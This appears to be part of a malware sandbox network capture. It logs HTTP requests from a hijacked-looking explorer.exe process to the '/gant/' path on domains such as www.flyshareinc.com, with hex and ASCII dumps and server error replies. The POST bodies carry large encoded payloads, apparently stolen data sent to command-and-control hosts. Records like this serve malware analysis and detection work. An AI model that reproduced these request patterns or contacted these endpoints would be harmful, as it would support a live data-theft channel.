                                                                                                                  Feb 13, 2023 19:00:45.711453915 CET675OUTData Raw: 53 43 63 28 64 78 43 55 70 46 45 51 5f 4d 74 39 4e 39 32 66 43 30 58 52 37 4f 50 67 33 4a 46 36 64 48 35 6d 35 30 5f 4a 42 5a 50 42 79 78 79 56 43 4e 53 7a 4d 5a 65 31 45 4d 42 65 46 69 64 6e 52 67 48 76 37 68 54 74 44 76 4b 77 66 4e 52 72 35 34
                                                                                                                  Data Ascii: SCc(dxCUpFEQ_Mt9N92fC0XR7OPg3JF6dH5m50_JBZPByxyVCNSzMZe1EMBeFidnRgHv7hTtDvKwfNRr54mqEHP~76EW5eAx_mEOv(ganeIhuSnJ4D26cilSAf3AlOxGmPofOF6w11q~SJ5VI~9jUwPOrfEsE0edQWsHV2dhfxoQIu5cH7g7-BqC_TtPowVDEQeyX3V6BnT7HZxqL8_WhoMm56yNuhjtGBGf2WKoBEsewymSqZh
                                                                                                                  Feb 13, 2023 19:00:45.720043898 CET677OUTData Raw: 41 35 4e 71 52 57 6e 59 6b 72 71 71 68 35 58 45 52 46 6b 68 4a 30 52 59 42 6e 68 55 58 6a 5f 4b 6d 62 79 4b 6b 49 6c 33 63 71 6a 53 4d 4b 68 36 5a 46 69 45 6b 65 66 54 70 77 45 54 46 31 30 69 54 4d 5f 6c 32 52 77 73 4f 71 36 36 55 4e 44 46 75 31
                                                                                                                  Data Ascii: A5NqRWnYkrqqh5XERFkhJ0RYBnhUXj_KmbyKkIl3cqjSMKh6ZFiEkefTpwETF10iTM_l2RwsOq66UNDFu1iyags5FEfGnhBGgkIi0Gr0TKoCtuU2hP0QroaVRvRWEM0n9mZnTlqpWBRi7vCRq0q~g(y0QtcPaSKuUXqufqmj-tRMb8hiDFCV3d6aqMzMA9pGkbGoJAOgOwdwr~KTpQaatZghLXXJrGXR3Ul5WvyqdvsnVCGJJaa
                                                                                                                  Feb 13, 2023 19:00:45.720237017 CET679OUTData Raw: 63 38 61 48 4b 46 47 6c 53 57 5f 4a 65 61 45 70 51 79 78 6a 6e 4b 74 4d 34 48 6a 43 53 45 54 38 4a 46 62 58 46 31 70 54 38 68 4b 55 53 7e 69 6c 73 59 69 32 55 38 5f 75 6d 6a 66 54 30 31 69 71 48 73 55 32 44 71 6c 5a 62 79 30 74 6e 54 49 78 70 59
                                                                                                                  Data Ascii: c8aHKFGlSW_JeaEpQyxjnKtM4HjCSET8JFbXF1pT8hKUS~ilsYi2U8_umjfT01iqHsU2DqlZby0tnTIxpYTxDS3lE3KVpM1xxi7y_x65KphKiIp2jWIuGJM6M6neuLD(z5iAOEjdO1C0Y11w2cm~QTAuF6iOvKzmgkOqLE8FvHmWUZT07zxuLGbBDmPhJEsH0xOMP(0AIpWrZ3P12ABVjn1ksUlm4k-~6kV7yQuU2WnDwCpOb(9
                                                                                                                  Feb 13, 2023 19:00:45.720434904 CET684OUTData Raw: 50 33 4e 77 4a 7a 6c 6a 74 33 50 69 6e 46 47 4c 44 43 62 68 32 55 51 64 6d 6a 64 55 6b 34 2d 54 33 39 39 38 5a 6c 68 71 68 71 62 41 57 56 6c 5a 6d 51 65 6d 55 75 4b 48 69 44 55 6f 31 55 54 38 50 4d 4e 31 66 4c 37 42 54 77 7a 62 52 34 6e 6a 6b 71
                                                                                                                  Data Ascii: P3NwJzljt3PinFGLDCbh2UQdmjdUk4-T3998ZlhqhqbAWVlZmQemUuKHiDUo1UT8PMN1fL7BTwzbR4njkqzhLIff_NZdFZj5vx2sCJZ1XQjMbwX8ta4XsWRqPmJFBEYdDb27CLITvECattT5y0EvfpA0BXsepjnFYaN2lo1~vFtQ83fCSNdbq4R5jwy1NprPx2p1xh50dQNXTPA(Dst2vFsylcPERPyhlrCGMMZJqJdZgP-pa6l
                                                                                                                  Feb 13, 2023 19:00:45.994868040 CET692INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DDXeza%2Bu0J5lGqHMUkkVpiuxklOeTWll8xCxMe5TjCGFKmwb2yOxkLtGZ1fL1Ur9B8Hskp6x9D%2BEWOIwKtQKtzjFPlOw8TN8VPoZNR99U1yZc5ftxC2uVHS2NcLPSjDW4B5rW%2FA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 798f7725aaaf9a0c-FRA
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c 3f 22 8d a6 e8 3a 5e d4 bb 69 62 d4 0e da a0 28 0c ce f0 8e c4 98 43 4e 49 4a b2 90 fa bf 2f 38 0f 79 f4 88 9b 60 b1 a8 3f 58 c3 d7 e5 7d 1c 5e 1e de f0 d5 9b f7 97 77 1f 6f ae 60 e1 32 19 b5 c2 57 94 fe 26 52 90 0e ae af e0 fc f7 08 42 3f 00 89 64 d6 ce 88 d2 f4 93 05 81 67 a0 25 17 48 40 32 35 9f 11 54 f4 c3 2d 89 20 7c f5 1b 2a 2e d2 df 29 7d 16 55 c9 01 38 2e ea fc db 44 5d bc 20 ea e2 1b 44 cd 5d 25 cd 77 1c b3 f2 50 0a a5 bb 92 16 c8 78 d4 0a 9d 70 12 a3 37 ef 6e 21 d7 42 39 0b 4e 43 6e f4 42 c4 c2 21 87 eb 1b f8 13 d6 eb 75 5f 3b 9d 6b 2e f5 5c f4 13 9d c1 9f 70 29 f5 92 a7 92 19 0c 83 52 48 2b cc d0 31 48 16 cc 58 74 33 f2 e1 ee 5f f4 82 40 50 0f 2c 9c cb 29 fe b1 14 ab 19 b9 d4 ca a1 72 f4 6e 93 23 81 a4 6c cd 88 c3 47 17 78 63 a6 5b 31 2f 49 f9 95 7e f8 81 5e ea 2c 67 4e c4 b2 29 e8 fa 6a 76 c5 e7 d8 58 a7 58 86 33 62 74 ac 9d 6d 4c 54 5a 28 8e 8f 3d 50 3a d5 52 ea f5 c1 92 95 c0 75 ae 8d 6b 2c 5a 0b ee 16 33 8e 2b 91 20 2d 1a 3d a1 84 13 4c 52 9b 30 89 b3 61 29 45 0a f5 00 06 e5 8c 58 b7 91 68 17 88 8e 80 e0 33 92 a4 f7 65 17 4d ac 25 b0 30 98 ce 48 90 70 45 93 b9 08 ca a1 20 63 42 f5 8b f1 20 6a b5 5a a1 4d 8c c8 5d d4 ea a4 4b 95 38 a1 55 a7 fb 59 a4 1d ae 93 65
                                                                                                                  Data Ascii: 89aXko7_qT5,?":^ib(CNIJ/8y`?X}^wo`2W&RB?dg%H@25T- |*.)}U8.D] D]%wPxp7n!B9NCnB!u_;k.\p)RH+1HXt3_@P,)rn#lGxc[1/I~^,gN)jvXX3btmLTZ(=P:Ruk,Z3+ -=LR0a)EXh3eM%0HpE cB jZM]K8UYe
                                                                                                                  Feb 13, 2023 19:00:45.994941950 CET694INData Raw: 86 ca f5 19 e7 57 2b 54 ee ad b0 0e 15 9a 76 7b 2d 14 d7 eb fe af 3f bd fd d1 b9 fc 67 fc 63 89 d6 b5 db ff be 7d ff ae fc df b7 ce 08 35 17 e9 a6 fb 79 c5 0c e0 6c 2b 9b 95 3d c9 6c 2b 7f 8e ee 4a a2 ff fc e7 e6 9a 77 08 1a a3 0d 4d 11 79 cc 92
                                                                                                                  Data Ascii: W+Tv{-?gc}5yl+=l+JwMyjfoX$h-5*:ez$R$I/7:GB8e.Vhj2|z}wG<$l~xrA=NEW#2ay.EOV/-zi|p
                                                                                                                  Feb 13, 2023 19:00:45.994975090 CET694INData Raw: db 42 f7 63 64 14 dc 26 c7 19 29 7b 48 f4 11 6d 18 94 8d e8 ef 53 4c e9 7d bd de e9 5d b5 f6 99 d6 7e 84 ab a7 18 ec 73 e2 e3 31 2c 9f 6d cf 06 df 2d 98 7a 28 4e 9c c7 ec 46 2f cd 56 d0 ab e6 f6 75 9a 3a 82 b5 2d ed 2b 21 01 cf 7c f5 80 bf e5 1b
                                                                                                                  Data Ascii: Bcd&){HmSL}]~s1,m-z(NF/Vu:-+!|l67t\zW_|)1u{/c;\'jN~nR$ta,<G69Rrb&b-9sj/`1g9]_1:d`o7"'_0JU~}3i\S+dNC|
                                                                                                                  Feb 13, 2023 19:00:45.995003939 CET694INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  14192.168.11.2049855188.114.97.380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:48.231018066 CET695OUTGET /gant/?j-Jh9P=2tUZKRHByxlttwUxv+GOcisphN8ZGwJH956H6V+vFw98R8B9R+q1qFuRbo6W7NeIxARixWcpsfkmwl3+P8H59+TtZSMQFDV9NQ==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.otopodlogi.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:00:48.431472063 CET696INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:48 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 16
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CB2jRGpIUHDGMIyW1iw8JtM966ohYpJFqI2fe7kcmog2Ez%2FH6VyviUBj9SLct1Om%2BBJUkmogVVpMqic3MIDNsEnUMgMjGs9wtvrP7kkePrHpTy7W8GxnrqEylv%2Fez89NsGjZd0Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 798f77357be39963-FRA
                                                                                                                  Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 30
                                                                                                                  Data Ascii: error code: 1000


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  15192.168.11.2049857162.241.225.6980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:54.676522970 CET704OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.flyshareinc.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.flyshareinc.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.flyshareinc.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 70 62 32 2d 48 4e 32 5a 6d 30 73 30 32 41 37 5a 66 47 52 49 30 7a 6b 48 61 72 57 56 54 69 42 46 71 52 64 71 73 57 73 44 7e 31 57 52 63 58 6f 63 5a 56 64 55 44 69 58 49 61 51 76 42 4a 59 56 50 31 4a 72 45 42 74 62 58 70 2d 7a 63 59 36 5a 59 7e 4f 79 61 66 49 32 76 52 64 69 79 45 67 41 4a 79 68 4e 72 44 53 70 77 72 59 4b 75 52 6b 52 32 42 31 75 68 41 72 4c 45 51 6d 4b 32 61 6f 53 78 61 44 62 42 45 6f 39 56 66 43 39 41 37 39 72 7a 63 62 58 5a 35 58 54 45 37 41 51 74 53 35 43 52 28 43 63 58 62 75 47 46 59 39 42 75 31 54 42 44 49 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=pb2-HN2Zm0s02A7ZfGRI0zkHarWVTiBFqRdqsWsD~1WRcXocZVdUDiXIaQvBJYVP1JrEBtbXp-zcY6ZY~OyafI2vRdiyEgAJyhNrDSpwrYKuRkR2B1uhArLEQmK2aoSxaDbBEo9VfC9A79rzcbXZ5XTE7AQtS5CR(CcXbuGFY9Bu1TBDIQ).
                                                                                                                  Feb 13, 2023 19:00:54.846653938 CET704INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:54 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  16192.168.11.2049858162.241.225.6980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:57.362962961 CET706OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.flyshareinc.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.flyshareinc.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.flyshareinc.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 70 62 32 2d 48 4e 32 5a 6d 30 73 30 35 44 7a 5a 65 6c 4a 49 31 54 6b 41 56 4c 57 56 59 43 42 42 71 52 52 71 73 58 59 31 7e 48 79 52 66 32 59 63 59 51 68 55 43 69 58 49 52 77 76 4f 45 34 56 52 31 4a 6e 4d 42 76 50 58 70 5f 58 63 4b 35 52 59 34 2d 7a 4d 48 34 32 77 57 64 6a 31 58 77 41 35 79 68 52 64 44 54 4e 77 73 73 36 75 58 57 4a 32 58 30 75 6d 45 4c 4c 34 53 6d 4b 78 55 49 53 76 61 44 6e 6a 45 74 51 67 65 30 31 41 36 64 4c 7a 64 62 58 65 78 6e 54 44 35 41 52 65 62 4c 58 4e 7e 43 55 4f 4f 73 47 71 59 64 41 41 36 44 41 32 57 53 44 49 61 67 47 70 37 48 4f 41 49 63 6e 4e 6a 45 4a 47 64 68 77 32 28 51 42 48 4b 55 38 77 64 6b 6d 5a 59 66 59 46 4b 34 34 58 78 78 6d 78 35 49 71 42 6f 78 79 2d 46 59 4e 46 56 73 4a 53 49 4a 79 4f 34 34 56 56 59 4b 6a 5a 72 4f 34 6a 42 41 4e 58 45 30 76 4d 6b 76 4c 66 74 57 4b 69 39 4d 4f 37 6b 6f 6f 73 72 4f 7e 37 75 6e 52 79 6a 51 49 30 67 6d 45 63 4c 79 6e 73 69 31 72 79 49 54 57 6f 55 34 33 31 70 39 33 47 7a 6e 43 33 48 68 45 64 70 74 56 79 38 4c 39 73 68 61 44 49 56 63 54 38 72 64 79 6e 64 54 52 75 6d 5f 79 2d 4f 6b 59 33 7a 53 37 6a 45 30 4d 70 46 43 4c 38 4b 4d 79 4b 4f 75 49 69 52 46 58 31 45 48 4f 6a 35 6e 30 4a 48 77 72 43 6b 31 35 49 47 30 4b 6e 47 61 4a 46 7e 43 71 55 55 43 38 62 68 34 28 76 31 66 77 79 70 67 57 65 66 33 38 49 69 7a 28 6a 6f 65 46 73 59 56 65 42 62 39 79 6e 66 30 53 62 77 59 54 49 4a 77 4f 49 41 57 63 78 42 5f 63 38 71 6e 4d 77 54 69 42 44 52 63 5a 52 30 67 74 4c 69 52 42 30 32 61 4f 4e 4c 53 6a 35 51 44 5a 74 66 73 57 31 33 65 49 35 6a 57 41 33 34 66 78 6d 42 70 55 43 30 48 41 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=pb2-HN2Zm0s05DzZelJI1TkAVLWVYCBBqRRqsXY1~HyRf2YcYQhUCiXIRwvOE4VR1JnMBvPXp_XcK5RY4-zMH42wWdj1XwA5yhRdDTNwss6uXWJ2X0umELL4SmKxUISvaDnjEtQge01A6dLzdbXexnTD5ARebLXN~CUOOsGqYdAA6DA2WSDIagGp7HOAIcnNjEJGdhw2(QBHKU8wdkmZYfYFK44Xxxmx5IqBoxy-FYNFVsJSIJyO44VVYKjZrO4jBANXE0vMkvLftWKi9MO7koosrO~7unRyjQI0gmEcLynsi1ryITWoU431p93GznC3HhEdptVy8L9shaDIVcT8rdyndTRum_y-OkY3zS7jE0MpFCL8KMyKOuIiRFX1EHOj5n0JHwrCk15IG0KnGaJF~CqUUC8bh4(v1fwypgWef38Iiz(joeFsYVeBb9ynf0SbwYTIJwOIAWcxB_c8qnMwTiBDRcZR0gtLiRB02aONLSj5QDZtfsW13eI5jWA34fxmBpUC0HA.
                                                                                                                  Feb 13, 2023 19:00:57.531254053 CET706INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:57 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  17192.168.11.2049859162.241.225.6980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:00.054460049 CET713OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.flyshareinc.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.flyshareinc.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.flyshareinc.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 70 62 32 2d 48 4e 32 5a 6d 30 73 30 35 44 7a 5a 65 6c 4a 49 31 54 6b 41 56 4c 57 56 59 43 42 42 71 52 52 71 73 58 59 31 7e 48 36 52 63 45 41 63 65 7a 4a 55 51 79 58 49 53 77 75 4a 45 34 55 55 31 4a 28 79 42 76 7a 74 70 38 28 63 4b 4f 56 59 34 4d 62 4d 43 34 32 74 4b 74 6a 6b 45 67 41 74 79 68 4e 4a 44 58 63 4e 72 59 79 75 52 6c 68 32 42 58 32 68 5a 72 4c 45 53 6d 4b 44 65 6f 53 64 61 44 53 75 45 74 63 67 65 32 42 41 37 72 50 7a 62 4d 37 65 34 58 54 41 7a 67 52 52 52 72 58 43 7e 42 6f 77 4f 73 47 63 59 63 45 41 36 42 59 32 58 56 58 4a 61 41 47 70 6c 58 4f 48 4d 63 62 42 6a 46 68 67 64 68 45 32 28 58 46 48 4b 30 38 77 4e 31 6d 61 4f 76 59 48 62 49 34 41 31 78 69 70 35 4a 4f 37 6f 7a 7e 2d 45 70 70 46 48 4c 56 53 4b 6f 79 4f 6b 49 56 58 63 4b 69 66 68 75 35 6e 42 44 31 78 45 30 4f 35 6b 73 48 66 73 32 71 69 35 64 4f 30 73 6f 6f 71 31 2d 7e 55 71 69 4a 58 6a 54 77 6f 67 6d 45 31 4c 77 4c 73 68 41 6a 79 4a 51 4f 72 53 6f 33 32 76 39 33 66 39 48 7e 35 48 69 67 56 70 74 73 5f 38 4d 64 73 6e 36 44 49 65 62 4f 71 68 74 79 67 41 44 52 47 6f 66 79 74 4f 6b 6b 72 7a 58 43 59 45 41 30 70 48 7a 33 38 62 4d 79 4a 4b 4f 49 6d 49 31 58 37 58 58 4f 6a 35 6e 35 34 48 77 58 43 6b 42 39 49 45 44 47 6e 44 4e 64 46 38 43 72 64 55 43 38 4f 68 34 44 63 31 65 49 63 70 68 6d 34 66 31 51 49 69 48 37 6a 72 66 46 72 65 6c 65 41 4e 4e 7a 78 63 45 50 5a 77 59 6e 36 4a 77 65 48 41 45 49 78 41 5f 4d 38 67 48 4d 33 59 69 42 45 48 4d 5a 48 77 67 67 50 69 52 74 4b 32 5a 53 64 4c 51 7a 35 54 57 34 77 4f 64 4b 68 69 4f 59 34 76 77 45 54 77 63 74 74 61 36 51 6f 67 79 51 77 38 73 61 6a 45 6f 57 67 4f 71 38 4f 46 56 4b 79 50 37 7a 44 75 65 4d 79 34 73 6e 62 66 77 65 6b 28 73 61 55 38 70 6e 31 69 38 7e 55 66 6e 59 7a 67 76 77 56 28 5f 4e 71 74 50 58 67 71 72 6d 4b 4c 4c 4f 30 46 56 39 48 32 6c 6a 30 37 67 6a 50 50 51 4c 63 37 45 6f 44 6d 4b 67 78 4d 49 4f 56 34 49 35 66 76 2d 4f 47 4e 68 61 38 31 73 32 55 71 45 28 77 68 66 75 74 48 33 72 63 67 36 74 48 69 79 62 69 58 75 7e 61 77 38 72 73 70 59 68 4c 77 59 30 79 57 4a 47 42 65 30 67 50 56 72 4f 4a 45 2d 4a 54 43 46 30 5a 61 37 67 44 75 48 6f 34 66 53 38 6e 28 4b 44 74 6b 36 62 7a 71 4f 63 4d 34 77 72 76 68 32 70 73 75 39 49 59 47 58 68 2d 6a 49 4e 4f 52 48 79 55 4d 75 55 4a 65 71 4b 66 7a 35 30 74 58 4f 74 69 75 42 78 4b 6c 4c 58 67 4a 56 57 70 47 44 4b 61 37 58 71 4a 58 77 6e 62 58 4a 68 2d 33 58 49 4b 63 30 65 56 38 4c 72 38 51 5a 6b 68 73 59 76 79 42 5a 4e 6e 59 78 6e 69 6a 56 49 7a 58 71 4c 70 48 68 28 50 46 41 75 4c 59 47 53 68 62 48 76 78 63 67 78 79 4a 44 54 70 41 49 52 73 56 76 36 51 4d 46 7e 69 65 5a 73 53 6f 39 39 52 7e 67 48 68 67 4e 44 51 7e 68 52 4a 79 35 28 33 6d 47 31 36 44 34 4a 4e 75 77 45 48 49 39 4f 4d 46 32 70 73 56 51 72 37 72 65 39 78 48 78 52 35 54 73 61 4d 78 66 35 65 6b 45 49 6c 66 54 4c 50 35 62 46 30 66 42 53 30 48 74 7a 39 70 51 42 58 63 47 63 66 6f 41 67 38 6f 4c 6d 4d 61 55 61 35 4b 47 58 44 4d 39 72 4b 64 4c 71 67 73 45 6b 4d 45 6a 7a 35 59 42 33 64 43 35 6c 51 50 6d 72 5f 4e 63 51 56 42 33 79 31 79 72 72 65 4a 61 57 34 35 4c 31 5a 33 77 64 4c 68 73 65 33 56 6a 7a 4c 62 6b 46 6f 64 4c 36 6b 4b 43 32 50 43 36 59 6c 36 45 47 5f 52 4a 7a 55 7a 47 59 4f 47 44 74 63 6f 4b 4e 31 6c 72 56 63 63 6c 45 68 7e 67 4e 45 70 50 59 52 6e 35 55 62 70 4a 70 62 79 7a 6c 6c 6e 50 56 70 50 4b 52 72 69 4a 58 66 50 74 41 5a 43 30 6a 67 73 56 48 77 41 35 4e 76 57 43 64 4e 41 49 30 36 69 68 6d 64 56 62 66 6f 76 30 4b 4f 75 58 54 6e 44 44 34 47 79 71 35 35 4b 36 39 54 59 7a 63 4e 36 50 6a 49 4d 50 55 69 39 70 44 64 70 58 31 63 75 62 58 38 6b 72 6b 43 71 4a 5a 69 55 57 74 73 69 34 66 55 69 4f 76 44 38 56 72 4c 79 54 4a 52 47 6d 4b 35 6d 61 66 49 71 42 5a 5a 51 35 71 61 43 5f 49 6e 4c 39 64 6b 42 34 66 4f 30 75 39 35 7a 77 39 71 39 7a 31 4b 78 63 59 6e 64 74 54 56 37 35 7a 69 7e 6e 67 34 35 69 59 39 53 46 78 45 37 45 75 77 72 4c 4c 45 31 65 52 39 73 4b 6e 51 41 31 77 5f 7a 46 63 76 38 67 49 41 32 59 64 34 42 4a 5a 73 61 39 61 54 4c 4b 50 6d 30 6c 70 74 65 39 79 2d 66 70 58 34 56 37 72 56 74 48 7a 63 76 69 78 6d 47 4b 73 37 65 63 4f 45 48 75 38 6e 41 4f 41 32 59 37 43 61 78 6e 6c 65
